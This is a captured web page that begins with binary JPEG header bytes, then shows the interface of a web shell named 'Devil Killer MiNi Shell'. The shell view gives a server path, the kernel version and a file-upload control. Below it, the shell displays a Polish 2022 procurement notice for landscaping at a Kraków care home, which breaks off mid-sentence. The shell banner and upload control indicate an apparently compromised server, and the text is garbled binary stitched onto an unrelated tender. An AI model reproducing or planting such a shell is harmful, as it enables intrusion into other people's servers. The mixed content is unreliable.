JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220706/0024244501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Urządzanie terenu wraz z pielęgnacją zieleni przy Domu Pomocy Społecznej im. L. i A. Helclów w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Kraków, Dom Pomocy Społecznej im. Ludwika i Anny Helclów w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351554353</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Helclów 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-148</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 634 42 55</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 633 08 28</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpshelclow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpshelclow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Urządzanie terenu wraz z pielęgnacją zieleni przy Domu Pomocy Społecznej im. L. i A. Helclów w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1ee828f2-fd13-11ec-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00242445</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00012763/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Urządzanie terenu wraz z pielęgnacją zieleni przy Domu Pomocy Społecznej im. L. i A. Helclów w Krakowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.krakow.pl/?dok_id=138165 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W niniejszym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344), tj.:<br/>1)	miniPortalu dostępnego pod adresem: https://miniportal.uzp.gov.pl/ (identyfikator postępowania: bda62c2f-254b-42d6-acc5-5589b1d05f16);<br/>2)	ePUAP-u dostępnego pod adresem: https://epuap.gov.pl/wps/portal - oznaczenie Zamawiającego w formularzach ePUAP: Dom Pomocy Społecznej im.LA Helclów DPSh.<br/>3)	poczty elektronicznej Zamawiającego: do@dpshelclow.pl. (UWAGA: ten sposób komunikacji nie jest właściwy dla złożenia oferty oraz dokumentów składanych wraz z ofertą).<br/>2.	Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert):<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami, w szczególności składanie oświadczeń innych niż oferta oraz dokumenty i oświadczenia składane wraz z ofertą, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się nr referencyjnym DO.271.1.6.2022 lub identyfikatorem postępowania z miniPortalu. Zamawiający dopuszcza pocztę elektroniczną jako środek komunikacji między Zamawiającym, a Wykonawcami z wyjątkiem składania ofert oraz dokumentów i oświadczeń składanych wraz z ofertą. Wyłączny i jedyny adres poczty elektronicznej (e-mail) Zamawiającego do komunikacji z Wykonawcami: do@dpshelclow.pl. Jeżeli Zamawiający lub Wykonawca komunikują się za pomocą poczty elektronicznej, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt otrzymania wiadomości e-mail. W przypadku braku otrzymania od Wykonawcy potwierdzenia dostarczenia wiadomości, Zamawiający uzna, iż pismo lub inna informacja wysłana przez Zamawiającego na adres e-mail podany przez Wykonawcę w ofercie, zostało mu doręczone w sposób umożliwiający zapoznanie się Wykonawcy z treścią pisma, niezależnie od ewentualnego potwierdzenia faktu jej otrzymania. Wykonawca ma obowiązek zapewnić sprawność urządzeń i systemów z jego strony odpowiadających za odbiór korespondencji. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r. poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 19 ust. 1 ustawy z 11 września 2019 r. - Prawo zamówień publicznych (Dz. z 2021 r. poz. 1129 z późn. zm.) w związku z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej także &#34;RODO&#34;) informuję, iż:1) Administratorem Pani/Pana danych osobowych jest Dom Pomocy Społecznej im. L. i A. Helclów w Krakowie przy ul. Helclów 2, zwany dalej także &#34;ADO&#34; lub &#34;DPS&#34;.2) Inspektor ochrony danych w Domu Pomocy Społecznej im. L. i A. Helclów w Krakowie – kontakt; e – mail: iod@dpshelclow.pl. lub tel. 12 634 42 55 wew. 195. 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w związku z postępowaniem DPS o udzielenie zamówienia publicznego nr DO.271.1.6.2022. 4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 ust. 1 oraz art. 74 ustawy z 11 września 2019 r. - Prawo zamówień publicznych, dalej &#34;Pzp&#34;. 5) Udostępnianie danych osobowych z protokołu postępowania o udzielenie zamówienia ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o których mowa w art. 18 ust. 3-6, art. 74 ust. 3 i Pzp stosuje się odpowiednio. 6) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 Pzp. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, DPS przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. 7) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z Pzp. Pozostałe regulacje dotyczące ochrony danych osobowych ujęto w rozdz. XXII Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Regulacje dotyczące ochrony danych osobowych ujęto w rozdz. XXIV Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DO.271.1.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie na terenie Domu Pomocy Społecznej im. L. i A. Helclów w Krakowie (DPS), na nieruchomości położonej przy ul. Helclów 2, oznaczonej jako działka ewidencyjna nr 116/14 obręb 116, jednostka ewidencyjna Śródmieście, usług w zakresie urządzania terenów zielonych wraz z pielęgnacją zieleni, w tym:<br/>1)	przygotowanie terenu oraz nasadzenia materiału roślinnego;<br/>2)	pielęgnacja istniejących drzew - cięcia sanitarne oraz korekcyjne lub redukcyjne lub techniczne drzew oraz montaż wiązań;<br/>3)	pielęgnację nasadzonych roślin.<br/>2.	Szczegółowy zakres i warunki realizacji przedmiotu zamówienia zostały określone w załącznikach do niniejszej SWZ, tj. w dokumentacji projektowej, pozwoleniach i opiniach Małopolskiego Wojewódzkiego Konserwatora Zabytków (MWKZ) oraz Wzorze Umowy stanowiącym Załącznik Nr 1 do SWZ (wraz z Załącznikami do Wzoru Umowy).<br/>UWAGA:<br/>W przypadku rozbieżności pomiędzy treścią dokumentacji projektowej, a treścią Wymogów ekologicznych będących Załącznikiem Nr 2 do Wzoru Umowy (stanowiącego Załącznik Nr 1 do SWZ) obowiązują zapisy z Wymogów ekologicznych.<br/>3.	Wymogi ekologiczne, określone szczegółowo w Załączniku Nr 2 do Wzoru Umowy (Załącznik Nr 1 do SWZ), opierają się na unijnych kryteriach tzw. „zielonych zamówień publicznych” <br/>i Zamawiający zobowiązany jest do ich zastosowania w niniejszym zamówieniu, z uwagi na dofinansowanie uzyskane z Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej (WFOŚiGW).<br/>4.	Wymogi ekologiczne podstawowe, tj. takie, których spełnienie przez oferowane usługi Wykonawca musi potwierdzić w niniejszym postępowaniu (patrz Rozdz. XII pkt 5 SWZ), to:<br/>1)	stosowanie do dostarczanych roślin wyłącznie opakowań biodegradowalnych (w przypadku opakowań jednorazowych) lub opakowań wielokrotnego użytku;<br/>2)	dostarczanie roślin niewielkich rozmiarów w zwrotnych pojemnikach;<br/>3)	stosowanie polepszaczy gleby niezawierających torfu ani osadów ściekowych;<br/>4)	selektywne gospodarowanie odpadami zgodnie z obowiązującymi w tym zakresie przepisami oraz unijnymi kryteriami zielonych zamówień;<br/>5)	natychmiastowe zgłaszanie Zamawiającemu wszelkich gatunków roślin lub zwierząt o charakterze inwazyjnym oraz podjęcie stosownych działań uzgodnionych z Zamawiającym, mających na celu eliminację tych gatunków;<br/>Powyższe wymogi zostały szczegółowo opisane w Załączniku Nr 2 do Wzoru Umowy, stanowiącego Załącznik Nr 1 do SWZ.<br/>5.	Wymogi ekologiczne dodatkowe, tj. takie, których spełnienie przez oferowane usługi będzie podlegało ocenie punktowej (patrz Rozdz. XIX SWZ oraz Rozdz. XII pkt 5 SWZ) i stanie się obligatoryjne w zakresie zadeklarowanym w Ofercie Wykonawcy, z którym zawarta zostanie Umowa, to:<br/>1)	dostarczenie roślin ozdobnych wyprodukowanych metodami ekologicznymi;<br/>2)	stosowanie ulepszaczy gleby spełniających kryteria unijne zielonych zamówień (uwaga: chodzi o wymogi bardziej restrykcyjne, niż określone w ust. 4 pkt 3) powyżej);<br/>3)	niestosowanie chemicznych środków ochrony roślin.<br/>Powyższe wymogi zostały szczegółowo opisane w Rozdz. XII SWZ oraz w Załączniku Nr 2 do Wzoru Umowy, stanowiącego Załącznik Nr 1 do SWZ.<br/>6.	Dodatkowe informacje dotyczące wykonania przedmiotu zamówienia: <br/>1)	Przedmiot zamówienia dotyczy części nieruchomości przy ul. Helclów 2 w Krakowie oznaczonej jako działka ewidencyjna nr 116/14 obręb 116 jednostka ewidencyjna Śródmieście, powierzchnia działki 3,5976 ha w tym powierzchnia zabudowy obiektów na terenie nieruchomości: 7 448,26 m2. Obszar, na którym będzie realizowany przedmiot Umowy, znajduje się w strefie objętej ochroną Wojewódzkiego Konserwatora Zabytków i nie jest wpisany do rejestru zabytków, ale znajduje się na obszarze układu urbanistycznego Kleparza, wpisanego do rejestru zabytków pod numerem A-648 oraz na obszarze uznanym za pomnik historii „Kraków – historyczny zespół miasta”.<br/>2)	Zakres przedmiotu zamówienia obejmuje pełny proces świadczenia usługi wraz z zakupem materiału roślinnego, dostarczeniem na teren prowadzenia prac, przygotowaniem podłoża do sadzenia krzewów i bylin; sadzeniem drzew liściastych, krzewów iglastych, krzewów liściastych i bylin, pielęgnację istniejących drzew - cięcia sanitarne oraz korekcyjne lub redukcyjne lub techniczne drzew oraz montaż wiązań) oraz usunięciem z terenu prowadzenia prac i utylizacją odpadów, a także pielęgnacją materiału roślinnego (utrzymaniem żywotności) do 31 grudnia 2025 roku od dnia odbioru nasadzonych roślin.<br/>3)	Ponadto w zakres usług stanowiących przedmiot zamówienia wchodzi nasadzenie 1 sztuki lipy drobnolistnej ‘Greenspire’ w ramach nasadzeń zastępczych zgodnie z decyzjami Małopolskiego Wojewódzkiego Konserwatora Zabytków.<br/>4)	Usługa świadczone będą w na terenie nieruchomości, która nie zostanie wyłączona z użytku, wyłączone z użytku zostaną wyłącznie miejsca gdzie Wykonawca będzie wykonywał prace.<br/>5)	Po uprzednim uzgodnieniu istnieje możliwość czasowego wyłączenia części nieruchomości na czas wykonywania usług.<br/>6)	Wykonawca zobowiązany jest zabezpieczyć majątek Zamawiającego przed uszkodzeniem z uwagi na prowadzone prace.<br/>7)	Usługi objęte zakresem niniejszego zamówienia prowadzone będą na podstawie: <br/>a)	Pozwolenia Nr ZN-III.5146.148.2019 wydanego przez Małopolskiego Wojewódzkiego Konserwatora Zabytków z dnia 16 grudnia 2019 r. zmienionego Decyzją znak ZN-III.5146.550.SK z dnia 8 października 2020 r.,<br/>b)	Pozwolenia Nr ZN-III.5146.152.2019 wydanego przez Małopolskiego Wojewódzkiego Konserwatora Zabytków z dnia 2 grudnia 2019 r.<br/>c)	Uzgodnienia projektu rewitalizacji zielni na terenie DPS im. Ludwika i Anny Helclów w Krakowie, znak ZN-III.5146.2020.SK z dnia 9 marca 2020 r., wydanego przez Małopolskiego Wojewódzkiego Konserwatora Zabytków wskazane wyżej dokumenty stanowią Załącznik Nr 6 do SWZ.<br/>7.	Obowiązki Wykonawcy związane z realizacją przedmiotu zamówienia szczegółowo określono we Wzorze Umowy, stanowiącym Załącznik Nr 1 do SWZ, oraz w Załącznikach do Wzoru Umowy, będących integralną częścią Wzoru Umowy.<br/>8.	Zamawiający informuje, iż na realizację przedmiotu zamówienia pozyskał dotację z Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Krakowie (WFOŚiGW) w wysokości 30% kosztów kwalifikowalnych zadania w ramach kategorii Ochrona Przyrody podkategoria 1.1.6.1 Urządzanie terenów zielonych. Koszty kwalifikowalne nie obejmują kosztów pielęgnacji i utrzymania żywotności materiału roślinnego przez okres gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03451000-6 - Rośliny</p> <p class="mb-0">03452000-3 - Drzewa</p> <p class="mb-0">03451300-9 - Krzewy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującym kryteriami :<br/>1)	Cena <br/>2)	Dostarczanie roślin ozdobnych wyprodukowanych metodami ekologicznymi(RE) <br/>3)	Stosowanie ulepszaczy gleby spełniających kryteria unijne zielonych zamówień (UG) <br/>4)	Niestosowanie chemicznych środków ochrony roślin (ŚCh)przeciwpożarowych (DRP) <br/><br/>2.	Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą sumę punktów: (C + RE + UG + ŚCh).<br/><br/>3.	Liczba punktów uzyskanych w kryterium „Cena” będzie obliczana zgodnie z poniższym wzorem: <br/>C = (C min : C bad) x 60 pkt (z dokładnością do 2. miejsca po przecinku)<br/>gdzie:<br/>C – liczba punktów w kryterium „Cena”<br/>C min – najniższa cena całkowita spośród badanych ofert<br/>C bad – cena całkowita oferty badanej <br/> <br/>4.	Liczba punktów uzyskanych w kryterium „Dostarczanie roślin ozdobnych wyprodukowanych metodami ekologicznymi (RE)” będzie obliczana według poniższych zasad:<br/>RE = (R bad : RE max) x 15 pkt (z dokładnością do 2. miejsca po przecinku)<br/>gdzie: <br/>RE bad – Liczba roślin wyprodukowana metodami ekologicznymi <br/>RE max – liczba wszystkich roślin<br/>Uwaga: <br/>Wykonawca dostarczy rośliny ozdobne wyprodukowane metodami ekologicznymi zgodnie z rozporządzeniem Wspólnoty Europejskiej nr 834/2007 w sprawie produkcji ekologicznej i znakowania produktów ekologicznych i uchylające rozporządzenie (EWG) nr 2092/91.<br/><br/>5.	Liczba punktów uzyskanych w kryterium „Stosowanie ulepszaczy gleby spełniających kryteria unijne zielonych zamówień (UG)” będzie obliczana według poniższych zasad:<br/><br/>Punkty w tym kryterium będą przyznawane za stosowanie ulepszaczy gleby spełniających kryteria unijne zielonych zamówień (UG).<br/>Za spełnienie poniższych warunków - Oferta otrzyma punkty (maksymalnie 15 punktów), według poniższych zasad:<br/>1)	jeżeli wykonawca zdeklaruje zastosowanie polepszaczy spełniających kryteria - przyznane punkty (UG) – 15 punktów<br/>2)	jeżeli wykonawca nie zdeklaruje zastosowania polepszaczy spełniających warunki – przyznane punkty (UG) - 0 punktów<br/>Uwaga stosowanie polepszaczy nie zawierających torfu i osadów ściekowych jest warunkiem obligatoryjnym dopuszczenia do realizacji zamówienia. Dodatkowe punkty, o których mowa powyżej, będą przyznawane tylko w przypadku zastosowana polepszaczy spełniających dodatkowe kryteria, tj.:<br/>•	substancje organiczne zawarte w polepszaczach gleby muszą powstać w wyniku przetwarzania lub ponownego wykorzystania odpadów,<br/>•	polepszacze nie zawierają osadów lub osady stanowią odpady zgodnie z europejskim wykazem odpadów,<br/>•	maksymalne stężenie metali ciężkich, mierzone w suchej masie nie przekracza: Zn 300 mg/kg, Cu 100 mg/kg, Ni 50 mg/kg, Cd 1 mg/kg, Pb 100 mg/kg, Hg 1 mg/kg, Cr 100 mg/kg, Mo 2 mg/kg, Se 1,5 mg/kg, As 10 mg/kg, F 200 mg/kg.<br/>W przypadku zadeklarowania przez Wykonawcę zastosowania ulepszaczy spełanijących powyższe kryteria, Zamawiający przyzna max liczbę punktów w kryterium „Stosowanie ulepszaczy gleby spełniających kryteria unijne zielonych zamówień (UG)”.<br/><br/>6.	Liczba punktów uzyskanych w kryterium „Niestosowanie chemicznych środków ochrony roślin (ŚCh)” będzie obliczana według poniższych zasad:<br/><br/>Punkty w tym kryterium będą przyznawane za wyeliminowanie ze stosowania chemicznych środków ochrony roślin (ŚCh).<br/>Za spełnienie 